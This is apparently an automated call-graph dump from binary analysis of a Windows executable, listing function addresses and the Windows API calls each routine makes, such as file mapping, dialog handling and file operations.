23313->23323 23314 89b683 FreeEnvironmentStringsW 23314->23313 23316 89b649 23315->23316 23315->23322 23317 898518 __onexit 21 API calls 23316->23317 23318 89b64f 23317->23318 23319 89b66c 23318->23319 23320 89b656 WideCharToMultiByte 23318->23320 23321 8984de _free 20 API calls 23319->23321 23320->23319 23321->23322 23322->23313 23322->23314 23323->23305 23325 898fa5 _abort 38 API calls 23324->23325 23326 89b195 23325->23326 23344 89b2ae 23326->23344 23328 89b19d 23353 89af1b 23328->23353 23331 89b1b4 23331->23309 23332 898518 __onexit 21 API calls 23333 89b1c5 23332->23333 23339 89b1f7 23333->23339 23360 89b350 23333->23360 23336 8984de _free 20 API calls 23336->23331 23337 89b1f2 23370 89895a 20 API calls _abort 23337->23370 23339->23336 23340 89b20f 23341 89b23b 23340->23341 23342 8984de _free 20 API calls 23340->23342 23341->23339 23371 89adf1 26 API calls 23341->23371 23342->23341 23345 89b2ba CallCatchBlock 23344->23345 23346 898fa5 _abort 38 API calls 23345->23346 23351 89b2c4 23346->23351 23348 89b348 CallCatchBlock 23348->23328 23351->23348 23352 8984de _free 20 API calls 23351->23352 23372 898566 38 API calls _abort 23351->23372 23373 89a3f1 EnterCriticalSection 23351->23373 23374 89b33f LeaveCriticalSection _abort 23351->23374 23352->23351 23354 893dd6 __cftof 38 API calls 23353->23354 23355 89af2d 23354->23355 23356 89af3c GetOEMCP 23355->23356 23357 89af4e 23355->23357 23359 89af65 23356->23359 23358 89af53 GetACP 23357->23358 23357->23359 23358->23359 23359->23331 23359->23332 23361 89af1b 40 API calls 23360->23361 23362 89b36f 23361->23362 23365 89b3c0 IsValidCodePage 23362->23365 23367 89b376 23362->23367 23368 89b3e5 ___scrt_fastfail 23362->23368 23363 88ec4a _ValidateLocalCookies 5 API calls 23364 89b1ea 23363->23364 23364->23337 23364->23340 23366 89b3d2 GetCPInfo 23365->23366 23365->23367 23366->23367 23366->23368 23367->23363 23375 89aff4 GetCPInfo 23368->23375 23370->23339 23371->23339 23373->23351 23374->23351 23376 89b02e 23375->23376 23384 89b0d8 23375->23384 23385 89c099 23376->23385 23379 88ec4a _ValidateLocalCookies 5 API calls 23381 89b184 23379->23381 23381->23367 23383 89a275 __vsnwprintf_l 43 API calls 23383->23384 23384->23379 23386 893dd6 __cftof 38 API calls 23385->23386 23387 89c0b9 MultiByteToWideChar 23386->23387 23389 89c0f7 23387->23389 23397 89c18f 23387->23397 23392 898518 __onexit 21 API calls 23389->23392 23395 89c118 __vsnwprintf_l ___scrt_fastfail 23389->23395 23390 88ec4a _ValidateLocalCookies 5 API calls 23393 89b08f 23390->23393 23391 89c189 23404 89a2c0 20 API calls _free 23391->23404 23392->23395 23399 89a275 23393->23399 23395->23391 23396 89c15d MultiByteToWideChar 23395->23396 23396->23391 23398 89c179 GetStringTypeW 23396->23398 23397->23390 23398->23391 23400 893dd6 __cftof 38 API calls 23399->23400 23401 89a288 23400->23401 23405 89a058 23401->23405 23404->23397 23407 89a073 __vsnwprintf_l 23405->23407 23406 89a099 MultiByteToWideChar 23408 89a24d 23406->23408 23409 89a0c3 23406->23409 23407->23406 23410 88ec4a _ValidateLocalCookies 5 API calls 23408->23410 23414 898518 __onexit 21 API calls 23409->23414 23416 89a0e4 __vsnwprintf_l 23409->23416 23411 89a260 23410->23411 23411->23383 23412 89a12d MultiByteToWideChar 23413 89a199 23412->23413 23415 89a146 23412->23415 23441 89a2c0 20 API calls _free 23413->23441 23414->23416 23432 89a72c 23415->23432 23416->23412 23416->23413 23420 89a1a8 23422 898518 __onexit 21 API calls 23420->23422 23426 89a1c9 __vsnwprintf_l 23420->23426 23421 89a170 23421->23413 23423 89a72c __vsnwprintf_l 11 API calls 23421->23423 23422->23426 23423->23413 23424 89a23e 23440 89a2c0 20 API calls _free 23424->23440 23426->23424 23427 89a72c __vsnwprintf_l 11 API calls 23426->23427 23428 89a21d 23427->23428 23428->23424 23429 89a22c WideCharToMultiByte 23428->23429 23429->23424 23430 89a26c 23429->23430 23442 89a2c0 20 API calls _free 23430->23442 23433 89a458 _abort 5 API calls 23432->23433 23434 89a753 23433->23434 23437 89a75c 23434->23437 23443 89a7b4 10 API calls 3 library calls 23434->23443 23436 89a79c LCMapStringW 23436->23437 23438 88ec4a _ValidateLocalCookies 5 API calls 23437->23438 23439 89a15d 23438->23439 23439->23413 23439->23420 23439->23421 23440->23413 23441->23408 23442->23413 23443->23436 24870 88eac0 27 API calls pre_c_initialization 24918 89ebc1 21 API calls __vsnwprintf_l 24919 8897c0 10 API calls 24872 899ec0 21 API calls 24920 89b5c0 GetCommandLineA GetCommandLineW 24873 88a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 23455 8710d5 23460 875bd7 23455->23460 23461 875be1 __EH_prolog 23460->23461 23467 87b07d 23461->23467 23463 875bed 23473 875dcc GetCurrentProcess GetProcessAffinityMask 23463->23473 23468 87b087 __EH_prolog 23467->23468 23474 87ea80 80 API calls 23468->23474 23470 87b099 23475 87b195 23470->23475 23474->23470 23476 87b1a7 ___scrt_fastfail 23475->23476 23479 880948 23476->23479 23482 880908 GetCurrentProcess GetProcessAffinityMask 23479->23482 23483 87b10f 23482->23483 23483->23463 24874 88acd0 100 API calls 24924 8819d0 26 API calls std::bad_exception::bad_exception 23491 88ead2 23492 88eade CallCatchBlock 23491->23492 23517 88e5c7 23492->23517 23494 88eae5 23496 88eb0e 23494->23496 23597 88ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23494->23597 23505 88eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23496->23505 23528 89824d 23496->23528 23500 88eb2d CallCatchBlock 23501 88ebad 23536 88f020 23501->23536 23505->23501 23598 897243 38 API calls 2 library calls 23505->23598 23512 88ebd9 23514 88ebe2 23512->23514 23599 89764a 28 API calls _abort 23512->23599 23600 88e73e 13 API calls 2 library calls 23514->23600 23518 88e5d0 23517->23518 23601 88ed5b IsProcessorFeaturePresent 23518->23601 23520 88e5dc 23602 892016 23520->23602 23522 88e5e1 23523 88e5e5 23522->23523 23611 8980d7 23522->23611 23523->23494 23526 88e5fc 23526->23494 23529 898264 23528->23529 23530 88ec4a _ValidateLocalCookies 5 API calls 23529->23530 23531 88eb27 23530->23531 23531->23500 23532 8981f1 23531->23532 23533 898220 23532->23533 23534 88ec4a _ValidateLocalCookies 5 API calls 23533->23534 23535 898249 23534->23535 23535->23505 23661 88f350 23536->23661 23539 88ebb3 23540 89819e 23539->23540 23541 89b290 51 API calls 23540->23541 23542 8981a7 23541->23542 23544 88ebbc 23542->23544 23663 89b59a 38 API calls 23542->23663 23545 88d5d4 23544->23545 23664 8800cf 23545->23664 23549 88d5f3 23713 88a335 23549->23713 23551 88d5fc 23717 8813b3 GetCPInfo 23551->23717 23553 88d606 ___scrt_fastfail 23554 88d619 GetCommandLineW 23553->23554 23555 88d628 23554->23555 23556 88d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23554->23556 23720 88bc84 23555->23720 23557 87400a _swprintf 51 API calls 23556->23557 23559 88d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23557->23559 23731 88aded LoadBitmapW 23559->23731 23562 88d6a0 23725 88d287 23562->23725 23563 88d636 OpenFileMappingW 23564 88d64f MapViewOfFile 23563->23564 23565 88d696 CloseHandle 23563->23565 23568 88d68d UnmapViewOfFile 23564->23568 23569 88d660 __vsnwprintf_l 23564->23569 23565->23556 23568->23565 23574 88d287 2 API calls 23569->23574 23576 88d67c 23574->23576 23575 888835 8 API calls 23577 88d76a DialogBoxParamW 23575->23577 23576->23568 23578 88d7a4 23577->23578 23579 88d7bd 23578->23579 23580 88d7b6 Sleep 23578->23580 23583 88d7cb 23579->23583 23761 88a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23579->23761 23580->23579 23582 88d7ea DeleteObject 23584 88d7ff DeleteObject 23582->23584 23585 88d806 23582->23585 23583->23582 23584->23585 23586 88d837 23585->23586 23588 88d849 23585->23588 23762 88d2e6 6 API calls 23586->23762 23758 88a39d 23588->23758 23590 88d83d CloseHandle 23590->23588 23591 88d883 23592 89757e GetModuleHandleW 23591->23592 23593 88ebcf 23592->23593 23593->23512 23594 8976a7 23593->23594 23969 897424 23594->23969 23597->23494 23598->23501 23599->23514 23600->23500 23601->23520 23603 89201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23602->23603 23615 89310e 23603->23615 23606 892029 23606->23522 23608 892031 23609 89203c 23608->23609 23629 89314a DeleteCriticalSection 23608->23629 23609->23522 23657 89b73a 23611->23657 23614 89203f 8 API calls 3 library calls 23614->23523 23616 893117 23615->23616 23618 893140 23616->23618 23619 892025 23616->23619 23630 893385 23616->23630 23635 89314a DeleteCriticalSection 23618->23635 23619->23606 23621 89215c 23619->23621 23650 89329a 23621->23650 23623 892166 23624 892171 23623->23624 23655 893348 6 API calls try_get_function 23623->23655 23624->23608 23626 89217f 23627 89218c 23626->23627 23656 89218f 6 API calls ___vcrt_FlsFree 23626->23656 23627->23608 23629->23606 23636 893179 23630->23636 23633 8933bc InitializeCriticalSectionAndSpinCount 23634 8933a8 23633->23634 23634->23616 23635->23619 23637 8931ad 23636->23637 23640 8931a9 23636->23640 23637->23633 23637->23634 23638 8931cd 23638->23637 23641 8931d9 GetProcAddress 23638->23641 23640->23637 23640->23638 23643 893219 23640->23643 23642 8931e9 __crt_fast_encode_pointer 23641->23642 23642->23637 23644 893241 LoadLibraryExW 23643->23644 23645 893236 23643->23645 23646 89325d GetLastError 23644->23646 23649 893275 23644->23649 23645->23640 23647 893268 LoadLibraryExW 23646->23647 23646->23649 23647->23649 23648 89328c FreeLibrary 23648->23645 23649->23645 23649->23648 23651 893179 try_get_function 5 API calls 23650->23651 23652 8932b4 23651->23652 23653 8932cc TlsAlloc 23652->23653 23654 8932bd 23652->23654 23654->23623 23655->23626 23656->23624 23660 89b753 23657->23660 23658 88ec4a _ValidateLocalCookies 5 API calls 23659 88e5ee 23658->23659 23659->23526 23659->23614 23660->23658 23662 88f033 GetStartupInfoW 23661->23662 23662->23539 23663->23542 23665 88e360 23664->23665 23666 8800d9 GetModuleHandleW 23665->23666 23667 8800f0 GetProcAddress 23666->23667 23668 880154 23666->23668 23670 880109 23667->23670 23671 880121 GetProcAddress 23667->23671 23669 880484 GetModuleFileNameW 23668->23669 23772 8970dd 42 API calls __vsnwprintf_l 23668->23772 23684 8804a3 23669->23684 23670->23671 23671->23668 23672 880133 23671->23672 23672->23668 23674 8803be 23674->23669 23675 8803c9 GetModuleFileNameW CreateFileW 23674->23675 23676 880478 CloseHandle 23675->23676 23677 8803fc SetFilePointer 23675->23677 23676->23669 23677->23676 23678 88040c ReadFile 23677->23678 23678->23676 23680 88042b 23678->23680 23680->23676 23683 880085 2 API calls 23680->23683 23682 8804d2 CompareStringW 23682->23684 23683->23680 23684->23682 23685 880508 GetFileAttributesW 23684->23685 23686 880520 23684->23686 23763 87acf5 23684->23763 23766 880085 23684->23766 23685->23684 23685->23686 23687 88052a 23686->23687 23689 880560 23686->23689 23690 880542 GetFileAttributesW 23687->23690 23692 88055a 23687->23692 23688 88066f 23712 889da4 GetCurrentDirectoryW 23688->23712 23689->23688 23691 87acf5 GetVersionExW 23689->23691 23690->23687 23690->23692 23693 88057a 23691->23693 23692->23689 23694 880581 23693->23694 23695 8805e7 23693->23695 23697 880085 2 API calls 23694->23697 23696 87400a _swprintf 51 API calls 23695->23696 23698 88060f AllocConsole 23696->23698 23699 88058b 23697->23699 23700 88061c GetCurrentProcessId AttachConsole 23698->23700 23701 880667 ExitProcess 23698->23701 23702 880085 2 API calls 23699->23702 23776 8935b3 23700->23776 23704 880595 23702->23704 23773 87ddd1 23704->23773 23705 88063d GetStdHandle WriteConsoleW Sleep FreeConsole 23705->23701 23708 87400a _swprintf 51 API calls 23709 8805c3 23708->23709 23710 87ddd1 53 API calls 23709->23710 23711 8805d2 23710->23711 23711->23701 23712->23549 23714 880085 2 API calls 23713->23714 23715 88a349 OleInitialize 23714->23715 23716 88a36c GdiplusStartup SHGetMalloc 23715->23716 23716->23551 23718 8813d7 IsDBCSLeadByte 23717->23718 23718->23718 23719 8813ef 23718->23719 23719->23553 23723 88bc8e 23720->23723 23721 88bda4 23721->23562 23721->23563 23722 88179d CharUpperW 23722->23723 23723->23721 23723->23722 23801 87ecad 80 API calls ___scrt_fastfail 23723->23801 23726 88e360 23725->23726 23727 88d294 SetEnvironmentVariableW 23726->23727 23728 88d2b7 23727->23728 23729 88d2df 23728->23729 23730 88d2d3 SetEnvironmentVariableW 23728->23730 23729->23556 23730->23729 23732 88ae0e 23731->23732 23733 88ae15 23731->23733 23807 889e1c FindResourceW 23732->23807 23735 88ae2a 23733->23735 23736 88ae1b GetObjectW 23733->23736 23802 889d1a 23735->23802 23736->23735 23738 88ae80 23750 87d31c 23738->23750 23739 88ae5c 23821 889d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23739->23821 23741 889e1c 12 API calls 23743 88ae4d 23741->23743 23743->23739 23745 88ae53 DeleteObject 23743->23745 23744 88ae64 23822 889d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23744->23822 23745->23739 23747 88ae6d 23823 889f5d 8 API calls ___scrt_fastfail 23747->23823 23749 88ae74 DeleteObject 23749->23738 23834 87d341 23750->23834 23752 87d328 23874 87da4e GetModuleHandleW FindResourceW 23752->23874 23755 888835 23960 88e24a 23755->23960 23759 88a3cc GdiplusShutdown OleUninitialize 23758->23759 23759->23591 23761->23583 23762->23590 23764 87ad09 GetVersionExW 23763->23764 23765 87ad45 23763->23765 23764->23765 23765->23684 23767 88e360 23766->23767 23768 880092 GetSystemDirectoryW 23767->23768 23769 8800c8 23768->23769 23770 8800aa 23768->23770 23769->23684 23771 8800bb LoadLibraryW 23770->23771 23771->23769 23772->23674 23778 87ddff 23773->23778 23777 8935bb 23776->23777 23777->23705 23777->23777 23784 87d28a 23778->23784 23781 87de22 LoadStringW 23782 87ddfc 23781->23782 23783 87de39 LoadStringW 23781->23783 23782->23708 23783->23782 23789 87d1c3 23784->23789 23786 87d2a7 23788 87d2bc 23786->23788 23797 87d2c8 26 API calls 23786->23797 23788->23781 23788->23782 23790 87d1d7 _strncpy 23789->23790 23791 87d1de 23789->23791 23790->23786 23793 87d202 23791->23793 23798 881596 WideCharToMultiByte 23791->23798 23796 87d233 23793->23796 23799 87dd6b 50 API calls __vsnprintf 23793->23799 23800 8958d9 26 API calls 3 library calls 23796->23800 23797->23788 23798->23793 23799->23796 23800->23790 23801->23723 23824 889d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23802->23824 23804 889d21 23805 889d2d 23804->23805 23825 889d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23804->23825 23805->23738 23805->23739 23805->23741 23808 889e3e SizeofResource 23807->23808 23809 889e70 23807->23809 23808->23809 23810 889e52 LoadResource 23808->23810 23809->23733 23810->23809 23811 889e63 LockResource 23810->23811 23811->23809 23812 889e77 GlobalAlloc 23811->23812 23812->23809 23813 889e92 GlobalLock 23812->23813 23814 889f21 GlobalFree 23813->23814 23815 889ea1 __vsnwprintf_l 23813->23815 23814->23809 23816 889f1a GlobalUnlock 23815->23816 23826 889d7b GdipAlloc 23815->23826 23816->23814 23819 889f05 23819->23816 23820 889eef GdipCreateHBITMAPFromBitmap 23820->23819 23821->23744 23822->23747 23823->23749 23824->23804 23825->23805 23827 889d9a 23826->23827 23828 889d8d 23826->23828 23827->23816 23827->23819 23827->23820 23830 889b0f 23828->23830 23831 889b30 GdipCreateBitmapFromStreamICM 23830->23831 23832 889b37 GdipCreateBitmapFromStream 23830->23832 23833 889b3c 23831->23833 23832->23833 23833->23827 23835 87d34b _wcschr __EH_prolog 23834->23835 23836 87d37a GetModuleFileNameW 23835->23836 23837 87d3ab 23835->23837 23838 87d394 23836->23838 23876 8799b0 23837->23876 23838->23837 23841 87d407 23887 895a90 26 API calls 3 library calls 23841->23887 23843 883781 76 API calls 23845 87d3db 23843->23845 23845->23841 23845->23843 23869 87d627 23845->23869 23846 87d41a 23888 895a90 26 API calls 3 library calls 23846->23888 23850 87d42c 23855 87d563 23850->23855 23850->23869 23889 879e40 23850->23889 23904 879bf0 23850->23904 23912 879d30 77 API calls 23850->23912 23852 87d57d ___std_exception_copy 23853 879bf0 80 API calls 23852->23853 23852->23869 23856 87d5a6 ___std_exception_copy 23853->23856 23855->23869 23913 879d30 77 API calls 23855->23913 23856->23869 23871 87d5b2 ___std_exception_copy 23856->23871 23914 88137a MultiByteToWideChar 23856->23914 23858 87d72b 23915 87ce72 76 API calls 23858->23915 23860 87da0a 23920 87ce72 76 API calls 23860->23920 23862 87d9fa 23862->23752 23863 87d771 23916 895a90 26 API calls 3 library calls 23863->23916 23865 87d742 23865->23863 23867 883781 76 API calls 23865->23867 23866 87d78b 23917 895a90 26 API calls 3 library calls 23866->23917 23867->23865 23897 879653 23869->23897 23870 881596 WideCharToMultiByte 23870->23871 23871->23858 23871->23860 23871->23862 23871->23869 23871->23870 23918 87dd6b 50 API calls __vsnprintf 23871->23918 23919 8958d9 26 API calls 3 library calls 23871->23919 23875 87d32f 23874->23875 23875->23755 23877 8799ba 23876->23877 23878 879a39 CreateFileW 23877->23878 23879 879aaa 23878->23879 23880 879a59 GetLastError 23878->23880 23881 879ae1 23879->23881 23884 879ac7 SetFileTime 23879->23884 23882 87b66c 2 API calls 23880->23882 23881->23845 23883 879a79 23882->23883 23883->23879 23885 879a7d CreateFileW GetLastError 23883->23885 23884->23881 23886 879aa1 23885->23886 23886->23879 23887->23846 23888->23850 23890 879e64 SetFilePointer 23889->23890 23892 879e53 23889->23892 23891 879e9d 23890->23891 23893 879e82 GetLastError 23890->23893 23891->23850 23892->23891 23921 876fa5 75 API calls 23892->23921 23893->23891 23895 879e8c 23893->23895 23895->23891 23922 876fa5 75 API calls 23895->23922 23898 879677 23897->23898 23899 879688 23897->23899 23898->23899 23900 879683 23898->23900 23901 87968a 23898->23901 23899->23752 23923 879817 23900->23923 23928 8796d0 23901->23928 23906 879bfc 23904->23906 23908 879c03 23904->23908 23906->23850 23907 879c9e 23907->23906 23955 876f6b 75 API calls 23907->23955 23908->23906 23908->23907 23910 879cc0 23908->23910 23943 87984e 23908->23943 23910->23906 23911 87984e 5 API calls 23910->23911 23911->23910 23912->23850 23913->23852 23914->23871 23915->23865 23916->23866 23917->23869 23918->23871 23919->23871 23920->23862 23921->23890 23922->23891 23924 879820 23923->23924 23927 879824 23923->23927 23924->23899 23927->23924 23934 87a12d 23927->23934 23929 8796fa 23928->23929 23930 8796dc 23928->23930 23931 879719 23929->23931 23942 876e3e 74 API calls 23929->23942 23930->23929 23932 8796e8 FindCloseChangeNotification 23930->23932 23931->23899 23932->23929 23935 88e360 23934->23935 23936 87a13a DeleteFileW 23935->23936 23937 87984c 23936->23937 23938 87a14d 23936->23938 23937->23899 23939 87b66c 2 API calls 23938->23939 23940 87a161 23939->23940 23940->23937 23941 87a165 DeleteFileW 23940->23941 23941->23937 23942->23931 23944 879867 ReadFile 23943->23944 23945 87985c GetStdHandle 23943->23945 23946 879880 23944->23946 23947 8798a0 23944->23947 23945->23944 23956 879989 23946->23956 23947->23908 23949 879887 23950 879895 23949->23950 23951 8798b7 23949->23951 23952 8798a8 GetLastError 23949->23952 23953 87984e GetFileType 23950->23953 23951->23947 23954 8798c7 GetLastError 23951->23954 23952->23947 23952->23951 23953->23947 23954->23947 23954->23950 23955->23906 23957 879992 GetFileType 23956->23957 23958 87998f 23956->23958 23959 8799a0 23957->23959 23958->23949 23959->23949 23961 88e24f ___std_exception_copy 23960->23961 23962 888854 23961->23962 23966 8971ad 7 API calls 2 library calls 23961->23966 23967 88ecce RaiseException Concurrency::cancel_current_task new 23961->23967 23968 88ecb1 RaiseException Concurrency::cancel_current_task 23961->23968 23962->23575 23966->23961 23970 897430 _abort 23969->23970 23971 89757e _abort GetModuleHandleW 23970->23971 23979 897448 23970->23979 23973 89743c 23971->23973 23973->23979 24003 8975c2 GetModuleHandleExW 23973->24003 23974 897450 23978 8974c5 23974->23978 23988 8974ee 23974->23988 24011 897f30 20 API calls _abort 23974->24011 23982 8974dd 23978->23982 23986 8981f1 _abort 5 API calls 23978->23986 23991 89a3f1 EnterCriticalSection 23979->23991 23980 89750b 23995 89753d 23980->23995 23981 897537 24012 8a1a19 5 API calls _ValidateLocalCookies 23981->24012 23987 8981f1 _abort 5 API calls 23982->23987 23986->23982 23987->23988 23992 89752e 23988->23992 23991->23974 24013 89a441 LeaveCriticalSection 23992->24013 23994 897507 23994->23980 23994->23981 24014 89a836 23995->24014 23998 89756b 24001 8975c2 _abort 8 API calls 23998->24001 23999 89754b GetPEB 23999->23998 24000 89755b GetCurrentProcess TerminateProcess 23999->24000 24000->23998 24002 897573 ExitProcess 24001->24002 24004 8975ec GetProcAddress 24003->24004 24005 89760f 24003->24005 24008 897601 24004->24008 24006 89761e 24005->24006 24007 897615 FreeLibrary 24005->24007 24009 88ec4a _ValidateLocalCookies 5 API calls 24006->24009 24007->24006 24008->24005 24010 897628 24009->24010 24010->23979 24011->23978 24013->23994 24015 89a85b 24014->24015 24019 89a851 24014->24019 24016 89a458 _abort 5 API calls 24015->24016 24016->24019 24017 88ec4a _ValidateLocalCookies 5 API calls 24018 897547 24017->24018 24018->23998 24018->23999 24019->24017 24030 88aee0 24031 88aeea __EH_prolog 24030->24031 24193 87130b 24031->24193 24034 88b5cb 24258 88cd2e 24034->24258 24035 88af2c 24037 88af39 24035->24037 24038 88afa2 24035->24038 24097 88af18 24035->24097 24041 88af3e 24037->24041 24045 88af75 24037->24045 24040 88b041 GetDlgItemTextW 24038->24040 24044 88afbc 24038->24044 24040->24045 24046 88b077 24040->24046 24050 87ddd1 53 API calls 24041->24050 24041->24097 24042 88b5e9 SendMessageW 24043 88b5f7 24042->24043 24047 88b600 SendDlgItemMessageW 24043->24047 24048 88b611 GetDlgItem SendMessageW 24043->24048 24049 87ddd1 53 API calls 24044->24049 24051 88af96 KiUserCallbackDispatcher 24045->24051 24045->24097 24052 88b08f GetDlgItem 24046->24052 24191 88b080 24046->24191 24047->24048 24276 889da4 GetCurrentDirectoryW 24048->24276 24057 88afde SetDlgItemTextW 24049->24057 24058 88af58 24050->24058 24051->24097 24055 88b0a4 SendMessageW SendMessageW 24052->24055 24056 88b0c5 SetFocus 24052->24056 24054 88b641 GetDlgItem 24059 88b65e 24054->24059 24060 88b664 SetWindowTextW 24054->24060 24055->24056 24061 88b0d5 24056->24061 24076 88b0ed 24056->24076 24062 88afec 24057->24062 24298 871241 SHGetMalloc 24058->24298 24059->24060 24277 88a2c7 GetClassNameW 24060->24277 24065 87ddd1 53 API calls 24061->24065 24070 88aff9 GetMessageW 24062->24070 24062->24097 24069 88b0df 24065->24069 24066 88af5f 24071 88af63 SetDlgItemTextW 24066->24071 24066->24097 24067 88b56b 24072 87ddd1 53 API calls 24067->24072 24299 88cb5a 24069->24299 24075 88b010 IsDialogMessageW 24070->24075 24070->24097 24071->24097 24077 88b57b SetDlgItemTextW 24072->24077 24075->24062 24079 88b01f TranslateMessage DispatchMessageW 24075->24079 24081 87ddd1 53 API calls 24076->24081 24080 88b58f 24077->24080 24079->24062 24082 87ddd1 53 API calls 24080->24082 24084 88b124 24081->24084 24085 88b5b8 24082->24085 24083 88b6af 24089 88b6df 24083->24089 24094 87ddd1 53 API calls 24083->24094 24090 87400a _swprintf 51 API calls 24084->24090 24092 87ddd1 53 API calls 24085->24092 24086 88b0e6 24203 87a04f 24086->24203 24088 88bdf5 98 API calls 24088->24083 24096 88bdf5 98 API calls 24089->24096 24141 88b797 24089->24141 24091 88b136 24090->24091 24095 88cb5a 16 API calls 24091->24095 24092->24097 24101 88b6c2 SetDlgItemTextW 24094->24101 24095->24086 24102 88b6fa 24096->24102 24098 88b847 24103 88b859 24098->24103 24104 88b850 EnableWindow 24098->24104 24099 88b17f 24209 88a322 SetCurrentDirectoryW 24099->24209 24100 88b174 GetLastError 24100->24099 24106 87ddd1 53 API calls 24101->24106 24111 88b70c 24102->24111 24129 88b731 24102->24129 24108 88b876 24103->24108 24317 8712c8 GetDlgItem EnableWindow 24103->24317 24104->24103 24107 88b6d6 SetDlgItemTextW 24106->24107 24107->24089 24110 88b89d 24108->24110 24119 88b895 SendMessageW 24108->24119 24109 88b195 24114 88b19e GetLastError 24109->24114 24115 88b1ac 24109->24115 24110->24097 24121 87ddd1 53 API calls 24110->24121 24315 889635 32 API calls 24111->24315 24112 88b78a 24116 88bdf5 98 API calls 24112->24116 24114->24115 24120 88b227 24115->24120 24125 88b237 24115->24125 24126 88b1c4 GetTickCount 24115->24126 24116->24141 24118 88b86c 24318 8712c8 GetDlgItem EnableWindow 24118->24318 24119->24110 24124 88b46c 24120->24124 24120->24125 24128 88b8b6 SetDlgItemTextW 24121->24128 24122 88b725 24122->24129 24218 8712e6 GetDlgItem ShowWindow 24124->24218 24131 88b24f GetModuleFileNameW 24125->24131 24132 88b407 24125->24132 24133 87400a _swprintf 51 API calls 24126->24133 24127 88b825 24316 889635 32 API calls 24127->24316 24128->24097 24129->24112 24136 88bdf5 98 API calls 24129->24136 24309 87eb3a 80 API calls 24131->24309 24132->24045 24145 87ddd1 53 API calls 24132->24145 24139 88b1dd 24133->24139 24135 87ddd1 53 API calls 24135->24141 24142 88b75f 24136->24142 24137 88b47c 24219 8712e6 GetDlgItem ShowWindow 24137->24219 24210 87971e 24139->24210 24140 88b844 24140->24098 24141->24098 24141->24127 24141->24135 24142->24112 24146 88b768 DialogBoxParamW 24142->24146 24144 88b275 24148 87400a _swprintf 51 API calls 24144->24148 24149 88b41b 24145->24149 24146->24045 24146->24112 24147 88b486 24150 87ddd1 53 API calls 24147->24150 24151 88b297 CreateFileMappingW 24148->24151 24152 87400a _swprintf 51 API calls 24149->24152 24154 88b490 SetDlgItemTextW 24150->24154 24155 88b2f9 GetCommandLineW 24151->24155 24156 88b376 __vsnwprintf_l 24151->24156 24157 88b439 24152->24157 24220 8712e6 GetDlgItem ShowWindow 24154->24220 24161 88b30a 24155->24161 24159 88b381 ShellExecuteExW 24156->24159 24170 87ddd1 53 API calls 24157->24170 24158 88b203 24162 88b215 24158->24162 24163 88b20a GetLastError 24158->24163 24173 88b39e 24159->24173 24310 88ab2e SHGetMalloc 24161->24310 24166 879653 79 API calls 24162->24166 24163->24162 24164 88b4a2 SetDlgItemTextW GetDlgItem 24167 88b4bf GetWindowLongW SetWindowLongW 24164->24167 24168 88b4d7 24164->24168 24166->24120 24167->24168 24221 88bdf5 24168->24221 24169 88b326 24311 88ab2e SHGetMalloc 24169->24311 24170->24045 24186 88b3cd Sleep 24173->24186 24187 88b3e1 24173->24187 24175 88b332 24312 88ab2e SHGetMalloc 24175->24312 24176 88bdf5 98 API calls 24179 88b4f3 24176->24179 24178 88b33e 24313 87ecad 80 API calls ___scrt_fastfail 24178->24313 24246 88d0f5 24179->24246 24181 88b3f7 UnmapViewOfFile CloseHandle 24181->24132 24184 88b355 MapViewOfFile 24184->24156 24185 88bdf5 98 API calls 24190 88b519 24185->24190 24186->24173 24186->24187 24187->24132 24187->24181 24188 88b542 24314 8712c8 GetDlgItem EnableWindow 24188->24314 24190->24188 24192 88bdf5 98 API calls 24190->24192 24191->24045 24191->24067 24192->24188 24194 871314 24193->24194 24195 87136d 24193->24195 24196 87137a 24194->24196 24319 87da98 62 API calls 2 library calls 24194->24319 24320 87da71 GetWindowLongW SetWindowLongW 24195->24320 24196->24034 24196->24035 24196->24097 24199 871336 24199->24196 24200 871349 GetDlgItem 24199->24200 24200->24196 24201 871359 24200->24201 24201->24196 24202 87135f SetWindowTextW 24201->24202 24202->24196 24206 87a059 24203->24206 24204 87a0ea 24205 87a207 9 API calls 24204->24205 24207 87a113 24204->24207 24205->24207 24206->24204 24206->24207 24321 87a207 24206->24321 24207->24099 24207->24100 24209->24109 24211 879728 24210->24211 24212 879792 CreateFileW 24211->24212 24213 879786 24211->24213 24212->24213 24214 8797e4 24213->24214 24215 87b66c 2 API calls 24213->24215 24214->24158 24216 8797cb 24215->24216 24216->24214 24217 8797cf CreateFileW 24216->24217 24217->24214 24218->24137 24219->24147 24220->24164 24222 88bdff __EH_prolog 24221->24222 24223 88b4e5 24222->24223 24224 88aa36 ExpandEnvironmentStringsW 24222->24224 24223->24176 24230 88be36 _wcsrchr 24224->24230 24226 88aa36 ExpandEnvironmentStringsW 24226->24230 24227 88c11d SetWindowTextW 24227->24230 24230->24223 24230->24226 24230->24227 24231 8935de 22 API calls 24230->24231 24233 88bf0b SetFileAttributesW 24230->24233 24238 88c2e7 GetDlgItem SetWindowTextW SendMessageW 24230->24238 24241 88c327 SendMessageW 24230->24241 24342 8817ac CompareStringW 24230->24342 24343 889da4 GetCurrentDirectoryW 24230->24343 24345 87a52a 7 API calls 24230->24345 24346 87a4b3 FindClose 24230->24346 24347 88ab9a 76 API calls ___std_exception_copy 24230->24347 24231->24230 24234 88bfc5 GetFileAttributesW 24233->24234 24245 88bf25 ___scrt_fastfail 24233->24245 24234->24230 24237 88bfd7 DeleteFileW 24234->24237 24237->24230 24239 88bfe8 24237->24239 24238->24230 24240 87400a _swprintf 51 API calls 24239->24240 24242 88c008 GetFileAttributesW 24240->24242 24241->24230 24242->24239 24243 88c01d MoveFileW 24242->24243 24243->24230 24244 88c035 MoveFileExW 24243->24244 24244->24230 24245->24230 24245->24234 24344 87b4f7 52 API calls 2 library calls 24245->24344 24247 88d0ff __EH_prolog 24246->24247 24348 87fead 24247->24348 24249 88d130 24352 875c59 24249->24352 24251 88d14e 24356 877c68 24251->24356 24255 